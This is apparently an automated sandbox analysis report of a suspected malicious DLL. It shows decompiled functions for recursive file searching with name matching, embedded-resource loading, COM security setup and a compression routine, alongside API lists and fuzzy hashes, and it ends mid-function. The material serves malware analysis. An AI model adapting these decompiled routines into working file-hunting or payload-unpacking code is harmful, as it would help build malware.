                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D865,00000C5B,00000000,?,00000000), ref: 1000D5D6
                                                                                                                                                                                                  • Part of subcall function 100085E5: HeapAlloc.KERNEL32(00000008,?,?,10008F65,00000100,?,10005FAC), ref: 100085F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2855449287-0
                                                                                                                                                                                                • Opcode ID: 363b7d0d28ed638fb71b6d1acd48cad8d07449bc4d488f072401678fb70f4c70
                                                                                                                                                                                                • Instruction ID: f881ef7bfe12a94a207f903728f076071e760daf75670509cf70e82b123430e5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 363b7d0d28ed638fb71b6d1acd48cad8d07449bc4d488f072401678fb70f4c70
                                                                                                                                                                                                • Instruction Fuzzy Hash: EE212834600255BBE7249BA6CC4CE5FBFBCEFC2B55B10415DB901AA290DB719A00CA30
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                			E1000AEF6(void* __ecx, void* __fp0, intOrPtr _a16) {
                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                				WCHAR* _v16;
                                                                                                                                                                                                				short _v560;
                                                                                                                                                                                                				short _v562;
                                                                                                                                                                                                				struct _WIN32_FIND_DATAW _v608;
                                                                                                                                                                                                				WCHAR* _t27;
                                                                                                                                                                                                				void* _t31;
                                                                                                                                                                                                				int _t36;
                                                                                                                                                                                                				intOrPtr _t37;
                                                                                                                                                                                                				intOrPtr _t44;
                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                				intOrPtr _t49;
                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                				intOrPtr _t56;
                                                                                                                                                                                                				void* _t61;
                                                                                                                                                                                                				char _t62;
                                                                                                                                                                                                				void* _t63;
                                                                                                                                                                                                				void* _t64;
                                                                                                                                                                                                				void* _t65;
                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t80 = __fp0;
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_t51 = __ecx;
                                                                                                                                                                                                				_push(L"\\*");
                                                                                                                                                                                                				_t27 = E100092C6(__ecx);
                                                                                                                                                                                                				_t65 = _t64 + 0xc;
                                                                                                                                                                                                				_v16 = _t27;
                                                                                                                                                                                                				if(_t27 == 0) {
                                                                                                                                                                                                					return _t27;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t61 = FindFirstFileW(_t27,  &_v608);
                                                                                                                                                                                                				if(_t61 == 0xffffffff) {
                                                                                                                                                                                                					L18:
                                                                                                                                                                                                					return E100085FB( &_v16, 0xfffffffe);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t31 = 0x2e;
                                                                                                                                                                                                				do {
                                                                                                                                                                                                					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
                                                                                                                                                                                                						if((_v608.dwFileAttributes & 0x00000010) != 0) {
                                                                                                                                                                                                							L14:
                                                                                                                                                                                                							_push(0);
                                                                                                                                                                                                							_push( &(_v608.cFileName));
                                                                                                                                                                                                							_push("\\");
                                                                                                                                                                                                							_t62 = E100092C6(_t51);
                                                                                                                                                                                                							_t65 = _t65 + 0x10;
                                                                                                                                                                                                							_v12 = _t62;
                                                                                                                                                                                                							if(_t62 != 0) {
                                                                                                                                                                                                								_t56 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                								 *((intOrPtr*)(_t56 + 0xb4))(1);
                                                                                                                                                                                                								_push(1);
                                                                                                                                                                                                								_push(1);
                                                                                                                                                                                                								_push(0);
                                                                                                                                                                                                								E1000AEF6(_t62, _t80, 1, 5, E1000EFEC, _a16);
                                                                                                                                                                                                								_t65 = _t65 + 0x1c;
                                                                                                                                                                                                								E100085FB( &_v12, 0xfffffffe);
                                                                                                                                                                                                							}
                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t63 = 0;
                                                                                                                                                                                                						do {
                                                                                                                                                                                                							_t10 = _t63 + 0x1001e78c; // 0x0
                                                                                                                                                                                                							_push( *_t10);
                                                                                                                                                                                                							_push( &(_v608.cFileName));
                                                                                                                                                                                                							_t44 =  *0x1001e690; // 0x4d2fb18
                                                                                                                                                                                                							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
                                                                                                                                                                                                								goto L12;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t48 = E1000EFEC(_t80, _t51,  &_v608, _a16);
                                                                                                                                                                                                							_t65 = _t65 + 0xc;
                                                                                                                                                                                                							if(_t48 == 0) {
                                                                                                                                                                                                								break;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t49 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                							 *((intOrPtr*)(_t49 + 0xb4))(1);
                                                                                                                                                                                                							L12:
                                                                                                                                                                                                							_t63 = _t63 + 4;
                                                                                                                                                                                                						} while (_t63 < 4);
                                                                                                                                                                                                						if((_v608.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                                							goto L16;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						goto L14;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					L16:
                                                                                                                                                                                                					_t36 = FindNextFileW(_t61,  &_v608);
                                                                                                                                                                                                					_t31 = 0x2e;
                                                                                                                                                                                                				} while (_t36 != 0);
                                                                                                                                                                                                				_t37 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				 *((intOrPtr*)(_t37 + 0x78))(_t61);
                                                                                                                                                                                                				goto L18;
                                                                                                                                                                                                			}


                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AF27
                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 1000B028
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileFind$FirstNext
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1690352074-0
                                                                                                                                                                                                • Opcode ID: ca3de102864d8ee622d69b58eebc667b6fae20f492893706f8c74e36c40fa9fd
                                                                                                                                                                                                • Instruction ID: 8b2e33f5fec1479e8f65e5dd4cd2829ae921fb9f591b6d0b0abd318ade50dbf3
                                                                                                                                                                                                • Opcode Fuzzy Hash: ca3de102864d8ee622d69b58eebc667b6fae20f492893706f8c74e36c40fa9fd
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0231C072A0035A6BFB10DBA4CC89FAE77B8EB047D0F0041A4F605A61D5E770EE848B61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,10005F90), ref: 100097FA
                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000981A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1518329722-0
                                                                                                                                                                                                • Opcode ID: 5adf31d11d863f069cab60e7e3886ce41b66a1e7e29a226f63a69a5805f02e98
                                                                                                                                                                                                • Instruction ID: df5b11f1c75c709aa4256a17088896f4071e5684466f1f315a6c8f8be7f84200
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5adf31d11d863f069cab60e7e3886ce41b66a1e7e29a226f63a69a5805f02e98
                                                                                                                                                                                                • Instruction Fuzzy Hash: 45E04F7A9007187FDB51EF689D46A9ABBFDEB84A00F118954AC85B7348E570EF048790
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E1000A55C(struct HINSTANCE__* __ecx, CHAR* __edx, void* __fp0, intOrPtr* _a4) {
                                                                                                                                                                                                				CHAR* _v8;
                                                                                                                                                                                                				struct HRSRC__* _v12;
                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                                                                				signed int _t17;
                                                                                                                                                                                                				struct HRSRC__* _t20;
                                                                                                                                                                                                				intOrPtr _t21;
                                                                                                                                                                                                				intOrPtr _t22;
                                                                                                                                                                                                				intOrPtr* _t23;
                                                                                                                                                                                                				intOrPtr* _t26;
                                                                                                                                                                                                				struct HINSTANCE__* _t28;
                                                                                                                                                                                                				intOrPtr _t30;
                                                                                                                                                                                                				intOrPtr* _t33;
                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                				intOrPtr _t37;
                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                				void* _t39;
                                                                                                                                                                                                				void* _t43;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t43 = __fp0;
                                                                                                                                                                                                				_t29 = __ecx;
                                                                                                                                                                                                				_v8 = __edx;
                                                                                                                                                                                                				_t28 = __ecx;
                                                                                                                                                                                                				_v20 = 0xa;
                                                                                                                                                                                                				_t35 = 0;
                                                                                                                                                                                                				_v16 = 3;
                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                					_t15 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                					_t17 = E10012465(_t29, 0, _t43, _t15 + 0x648, 0x1e, 0x32);
                                                                                                                                                                                                					_t29 =  *0x1001e688; // 0x4cb04a0
                                                                                                                                                                                                					_t39 = _t39 + 0xc;
                                                                                                                                                                                                					_t4 = _t29 + 0x644; // 0x0
                                                                                                                                                                                                					_t20 = FindResourceA(_t28, _v8, _t17 *  *_t4 +  *((intOrPtr*)(_t38 + _t35 * 4 - 0x10)));
                                                                                                                                                                                                					_v12 = _t20;
                                                                                                                                                                                                					if(_t20 != 0) {
                                                                                                                                                                                                						break;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t35 = _t35 + 1;
                                                                                                                                                                                                					if(_t35 < 2) {
                                                                                                                                                                                                						continue;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					L5:
                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t21 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				_t22 =  *((intOrPtr*)(_t21 + 0x98))(_t28, _t20);
                                                                                                                                                                                                				_t30 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				_t37 = _t22;
                                                                                                                                                                                                				_t23 =  *((intOrPtr*)(_t30 + 0x9c))(_t28, _v12);
                                                                                                                                                                                                				__eflags = _t23;
                                                                                                                                                                                                				if(_t23 != 0) {
                                                                                                                                                                                                					_t33 = E1000864A(_t23, _t37);
                                                                                                                                                                                                					__eflags = _t33;
                                                                                                                                                                                                					if(_t33 == 0) {
                                                                                                                                                                                                						goto L5;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t26 = _a4;
                                                                                                                                                                                                					__eflags = _t26;
                                                                                                                                                                                                					if(_t26 != 0) {
                                                                                                                                                                                                						 *_t26 = _t37;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					return _t33;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				goto L5;
                                                                                                                                                                                                			}























                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 10012465: _ftol2_sse.MSVCRT ref: 100124C6
                                                                                                                                                                                                • FindResourceA.KERNEL32(10000000,?,0000000A), ref: 1000A5AD
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FindResource_ftol2_sse
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 726351646-0
                                                                                                                                                                                                • Opcode ID: 09db64f82ff27f4723c2f1b62d6aeaba463d45ed4d0f3522aaf98fb1050e951e
                                                                                                                                                                                                • Instruction ID: 572c9de28148780b48db31adbdc9b0c86f97872e6d9a47d1e0b19fac1a6d80de
                                                                                                                                                                                                • Opcode Fuzzy Hash: 09db64f82ff27f4723c2f1b62d6aeaba463d45ed4d0f3522aaf98fb1050e951e
                                                                                                                                                                                                • Instruction Fuzzy Hash: C7119D71A00315AFFB04CB69DC85E5E7BECEB55385F014068F809D7252EA71DE808B54
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 99%
                                                                                                                                                                                                			E10016EF0(intOrPtr _a4, signed int _a8, signed int _a12) {
                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                				signed short* _v12;
                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                				signed short _v20;
                                                                                                                                                                                                				unsigned int _v24;
                                                                                                                                                                                                				signed short _v28;
                                                                                                                                                                                                				signed int _t223;
                                                                                                                                                                                                				signed int _t235;
                                                                                                                                                                                                				signed int _t237;
                                                                                                                                                                                                				signed short _t240;
                                                                                                                                                                                                				signed int _t241;
                                                                                                                                                                                                				signed short _t244;
                                                                                                                                                                                                				signed int _t245;
                                                                                                                                                                                                				signed short _t248;
                                                                                                                                                                                                				signed int _t249;
                                                                                                                                                                                                				signed int _t250;
                                                                                                                                                                                                				void* _t254;
                                                                                                                                                                                                				signed char _t259;
                                                                                                                                                                                                				signed int _t275;
                                                                                                                                                                                                				signed int _t289;
                                                                                                                                                                                                				signed int _t308;
                                                                                                                                                                                                				signed short _t316;
                                                                                                                                                                                                				signed int _t321;
                                                                                                                                                                                                				void* _t329;
                                                                                                                                                                                                				signed short _t330;
                                                                                                                                                                                                				signed short _t333;
                                                                                                                                                                                                				signed short _t334;
                                                                                                                                                                                                				signed short _t343;
                                                                                                                                                                                                				signed short _t346;
                                                                                                                                                                                                				signed short _t347;
                                                                                                                                                                                                				signed short _t348;
                                                                                                                                                                                                				signed short _t358;
                                                                                                                                                                                                				signed short _t361;
                                                                                                                                                                                                				signed short _t362;
                                                                                                                                                                                                				signed short _t363;
                                                                                                                                                                                                				signed short _t370;
                                                                                                                                                                                                				signed int _t373;
                                                                                                                                                                                                				signed int _t378;
                                                                                                                                                                                                				signed short _t379;
                                                                                                                                                                                                				signed short _t382;
                                                                                                                                                                                                				unsigned int _t388;
                                                                                                                                                                                                				unsigned short _t390;
                                                                                                                                                                                                				unsigned short _t392;
                                                                                                                                                                                                				unsigned short _t394;
                                                                                                                                                                                                				signed int _t396;
                                                                                                                                                                                                				signed int _t397;
                                                                                                                                                                                                				signed int _t398;
                                                                                                                                                                                                				signed int _t400;
                                                                                                                                                                                                				signed short _t401;
                                                                                                                                                                                                				signed int _t402;
                                                                                                                                                                                                				signed int _t403;
                                                                                                                                                                                                				signed int _t407;
                                                                                                                                                                                                				signed int _t409;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t223 = _a8;
                                                                                                                                                                                                				_t235 =  *(_t223 + 2) & 0x0000ffff;
                                                                                                                                                                                                				_push(_t397);
                                                                                                                                                                                                				_t388 = 0;
                                                                                                                                                                                                				_t398 = _t397 | 0xffffffff;
                                                                                                                                                                                                				if(_a12 < 0) {
                                                                                                                                                                                                					L42:
                                                                                                                                                                                                					return _t223;
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t329 =  !=  ? 7 : 0x8a;
                                                                                                                                                                                                					_v12 = _t223 + 6;
                                                                                                                                                                                                					_t254 = (0 | _t235 != 0x00000000) + 3;
                                                                                                                                                                                                					_v16 = _a12 + 1;
                                                                                                                                                                                                					do {
                                                                                                                                                                                                						_v24 = _t388;
                                                                                                                                                                                                						_t388 = _t388 + 1;
                                                                                                                                                                                                						_a8 = _t235;
                                                                                                                                                                                                						_a12 = _t235;
                                                                                                                                                                                                						_v8 =  *_v12 & 0x0000ffff;
                                                                                                                                                                                                						_t223 = _a4;
                                                                                                                                                                                                						if(_t388 >= _t329) {
                                                                                                                                                                                                							L4:
                                                                                                                                                                                                							if(_t388 >= _t254) {
                                                                                                                                                                                                								if(_a8 == 0) {
                                                                                                                                                                                                									_t122 = _t223 + 0x16bc; // 0xec8b55c3
                                                                                                                                                                                                									_t400 =  *_t122;
                                                                                                                                                                                                									if(_t388 > 0xa) {
                                                                                                                                                                                                										_t168 = _t223 + 0xac4; // 0xff0c75ff
                                                                                                                                                                                                										_t330 =  *_t168 & 0x0000ffff;
                                                                                                                                                                                                										_t169 = _t223 + 0xac6; // 0x875ff0c
                                                                                                                                                                                                										_t237 =  *_t169 & 0x0000ffff;
                                                                                                                                                                                                										_v24 = _t330;
                                                                                                                                                                                                										_t171 = _t223 + 0x16b8; // 0x5d5b5e5f
                                                                                                                                                                                                										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
                                                                                                                                                                                                										_v28 = _t333;
                                                                                                                                                                                                										if(_t400 <= 0x10 - _t237) {
                                                                                                                                                                                                											_t259 = _t400 + _t237;
                                                                                                                                                                                                										} else {
                                                                                                                                                                                                											_t173 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                											 *(_t223 + 0x16b8) = _t333;
                                                                                                                                                                                                											_t175 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                											 *((char*)( *_t175 +  *_t173)) = _v28;
                                                                                                                                                                                                											_t223 = _a4;
                                                                                                                                                                                                											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                											_t181 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                											_t182 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                											_t183 = _t223 + 0x16b9; // 0xc35d5b5e
                                                                                                                                                                                                											 *((char*)( *_t181 +  *_t182)) =  *_t183;
                                                                                                                                                                                                											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                											_t333 = _v24 >> 0x10;
                                                                                                                                                                                                											_t189 = _t223 + 0x16bc; // 0xec8b55c3
                                                                                                                                                                                                											_t259 =  *_t189 + 0xfffffff0 + _t237;
                                                                                                                                                                                                										}
                                                                                                                                                                                                										_t334 = _t333 & 0x0000ffff;
                                                                                                                                                                                                										 *(_t223 + 0x16bc) = _t259;
                                                                                                                                                                                                										 *(_t223 + 0x16b8) = _t334;
                                                                                                                                                                                                										_t401 = _t334 & 0x0000ffff;
                                                                                                                                                                                                										if(_t259 <= 9) {
                                                                                                                                                                                                											_t209 = _t388 - 0xb; // -10
                                                                                                                                                                                                											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
                                                                                                                                                                                                											 *(_t223 + 0x16bc) = _t259 + 7;
                                                                                                                                                                                                										} else {
                                                                                                                                                                                                											_t193 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                											_t390 = _t388 + 0xfffffff5;
                                                                                                                                                                                                											_t194 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                											_t240 = _t390 << _t259 | _t401;
                                                                                                                                                                                                											 *(_t223 + 0x16b8) = _t240;
                                                                                                                                                                                                											 *( *_t193 +  *_t194) = _t240;
                                                                                                                                                                                                											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                											_t199 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                											_t200 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                											_t201 = _t223 + 0x16b9; // 0xc35d5b5e
                                                                                                                                                                                                											 *((char*)( *_t199 +  *_t200)) =  *_t201;
                                                                                                                                                                                                											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
                                                                                                                                                                                                											 *(_t223 + 0x16b8) = _t390 >> 0x10;
                                                                                                                                                                                                										}
                                                                                                                                                                                                										goto L35;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t123 = _t223 + 0xac0; // 0x6aec8b
                                                                                                                                                                                                									_t343 =  *_t123 & 0x0000ffff;
                                                                                                                                                                                                									_t124 = _t223 + 0xac2; // 0x75ff006a
                                                                                                                                                                                                									_t241 =  *_t124 & 0x0000ffff;
                                                                                                                                                                                                									_v24 = _t343;
                                                                                                                                                                                                									_t126 = _t223 + 0x16b8; // 0x5d5b5e5f
                                                                                                                                                                                                									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
                                                                                                                                                                                                									_v28 = _t346;
                                                                                                                                                                                                									if(_t400 > 0x10 - _t241) {
                                                                                                                                                                                                										_t128 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                										 *(_t223 + 0x16b8) = _t346;
                                                                                                                                                                                                										_t130 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                										 *((char*)( *_t130 +  *_t128)) = _v28;
                                                                                                                                                                                                										_t223 = _a4;
                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                										_t136 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                										_t137 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                										_t138 = _t223 + 0x16b9; // 0xc35d5b5e
                                                                                                                                                                                                										 *((char*)( *_t136 +  *_t137)) =  *_t138;
                                                                                                                                                                                                										_t142 = _t223 + 0x16bc; // 0xec8b55c3
                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                										_t346 = _v24 >> 0x10;
                                                                                                                                                                                                										_t400 =  *_t142 + 0xfffffff0;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t403 = _t400 + _t241;
                                                                                                                                                                                                									_t347 = _t346 & 0x0000ffff;
                                                                                                                                                                                                									 *(_t223 + 0x16bc) = _t403;
                                                                                                                                                                                                									 *(_t223 + 0x16b8) = _t347;
                                                                                                                                                                                                									_t348 = _t347 & 0x0000ffff;
                                                                                                                                                                                                									if(_t403 <= 0xd) {
                                                                                                                                                                                                										_t163 = _t403 + 3; // 0xec8b55c6
                                                                                                                                                                                                										_t275 = _t163;
                                                                                                                                                                                                										L28:
                                                                                                                                                                                                										 *(_t223 + 0x16bc) = _t275;
                                                                                                                                                                                                										_t165 = _t388 - 3; // -2
                                                                                                                                                                                                										_t166 = _t223 + 0x16b8; // 0x5d5b5e5f
                                                                                                                                                                                                										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
                                                                                                                                                                                                									} else {
                                                                                                                                                                                                										_t392 = _t388 + 0xfffffffd;
                                                                                                                                                                                                										_t147 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                										_t244 = _t392 << _t403 | _t348;
                                                                                                                                                                                                										_t148 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                										 *(_t223 + 0x16b8) = _t244;
                                                                                                                                                                                                										 *( *_t148 +  *_t147) = _t244;
                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                										_t153 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                										_t154 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                										_t155 = _t223 + 0x16b9; // 0xc35d5b5e
                                                                                                                                                                                                										 *((char*)( *_t153 +  *_t154)) =  *_t155;
                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
                                                                                                                                                                                                										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									goto L35;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t289 = _a12;
                                                                                                                                                                                                								if(_t289 != _t398) {
                                                                                                                                                                                                									_t53 = _t289 * 4; // 0x5dc033c3
                                                                                                                                                                                                									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
                                                                                                                                                                                                									_t56 = _t235 * 4; // 0x33c35d0c
                                                                                                                                                                                                									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
                                                                                                                                                                                                									_t58 = _t223 + 0x16bc; // 0xec8b55c3
                                                                                                                                                                                                									_t407 =  *_t58;
                                                                                                                                                                                                									_v28 = _t370;
                                                                                                                                                                                                									_t60 = _t223 + 0x16b8; // 0x5d5b5e5f
                                                                                                                                                                                                									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
                                                                                                                                                                                                									if(_t407 <= 0x10 - _t396) {
                                                                                                                                                                                                										_t373 = _t249;
                                                                                                                                                                                                										_t308 = _t407 + _t396;
                                                                                                                                                                                                									} else {
                                                                                                                                                                                                										_t61 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                										_t62 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                										 *(_t223 + 0x16b8) = _t249;
                                                                                                                                                                                                										 *( *_t62 +  *_t61) = _t249;
                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                										_t67 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                										_t68 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                										_t69 = _t223 + 0x16b9; // 0xc35d5b5e
                                                                                                                                                                                                										 *((char*)( *_t67 +  *_t68)) =  *_t69;
                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                										_t75 = _t223 + 0x16bc; // 0xec8b55c3
                                                                                                                                                                                                										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                                										_t308 =  *_t75 + 0xfffffff0 + _t396;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t388 = _v24;
                                                                                                                                                                                                									 *(_t223 + 0x16bc) = _t308;
                                                                                                                                                                                                									 *(_t223 + 0x16b8) = _t373;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t80 = _t223 + 0xabc; // 0x55c35dc0
                                                                                                                                                                                                								_t358 =  *_t80 & 0x0000ffff;
                                                                                                                                                                                                								_t81 = _t223 + 0x16bc; // 0xec8b55c3
                                                                                                                                                                                                								_t402 =  *_t81;
                                                                                                                                                                                                								_t82 = _t223 + 0xabe; // 0xec8b55c3
                                                                                                                                                                                                								_t245 =  *_t82 & 0x0000ffff;
                                                                                                                                                                                                								_v24 = _t358;
                                                                                                                                                                                                								_t84 = _t223 + 0x16b8; // 0x5d5b5e5f
                                                                                                                                                                                                								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
                                                                                                                                                                                                								_v28 = _t361;
                                                                                                                                                                                                								if(_t402 > 0x10 - _t245) {
                                                                                                                                                                                                									_t86 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                									 *(_t223 + 0x16b8) = _t361;
                                                                                                                                                                                                									_t88 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                									 *((char*)( *_t88 +  *_t86)) = _v28;
                                                                                                                                                                                                									_t223 = _a4;
